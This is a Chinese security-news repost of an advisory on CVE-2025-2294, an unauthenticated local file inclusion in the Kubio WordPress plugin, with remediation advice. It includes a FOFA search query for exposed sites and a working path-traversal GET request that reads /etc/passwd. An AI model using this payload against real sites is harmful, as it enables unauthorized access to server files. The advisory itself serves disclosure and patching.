WordPress 未授权本地文件包含漏洞(CVE-2025-2294)

2025年4月7日23:56:14评论24 views字数 510阅读1分42秒阅读模式

漏洞概述

适用于 WordPress 的 Kubio AI Page Builder 插件在 2.5.1 之前的所有版本中都容易受到本地文件包含thekubio_hybrid_theme_load_template 的攻击。这使得未经身份验证的攻击者可以在服务器上包含和执行任意文件，从而允许执行这些文件中的任何 PHP 代码。这可用于绕过访问控制、获取敏感数据，或在可以上传和包含图像和其他“安全”文件类型的情况下实现代码执行。

搜索引擎

FOFA:

body="wp-content/plugins/kubio/"

漏洞复现

GET /?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../../etc/passwd HTTP/1.1
Host: yourdomain.com

自查工具

nuclei

afrog

xray

修复建议

1、关闭互联网暴露面或接口设置访问权限

2、升级至安全版本

原文始发于微信公众号（Nday Poc）：WordPress 未授权本地文件包含漏洞(CVE-2025-2294)

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由 admin 发表于 2025年4月7日23:56:14
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
WordPress 未授权本地文件包含漏洞(CVE-2025-2294)https://cn-sec.com/archives/3924665.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

WordPress 未授权本地文件包含漏洞(CVE-2025-2294)

通达OA远程代码执行漏洞

汉王e脸通智慧园区管理平台SQL注入漏洞

HANDLINK ISS-7000v2 网关 login_handler.cgi 命令注入 POC

Fortinet零日RCE (CVE-2025-32756)深度解析：原理、TTPs及企业级纵深防御策略

poc | Windows 远程桌面网关 (RD Gateway) CVE-2025-21297介绍

漏洞预警：CVE-2025-31258 macOS远程视图服务沙箱逃逸漏洞PoC已公开

【成功复现】JeeWMS系统SQL注入漏洞漏洞(CVE-2025-0392)

CVE-2025-4427/4428：Ivanti EPMM 远程代码执行 - 技术分析

装盟科技-家装ERP管理系统 Public.asmx SQL注入漏洞

装盟科技-家装ERP管理系统 Budget.asmx SQL注入漏洞

发表评论

在线咨询

微信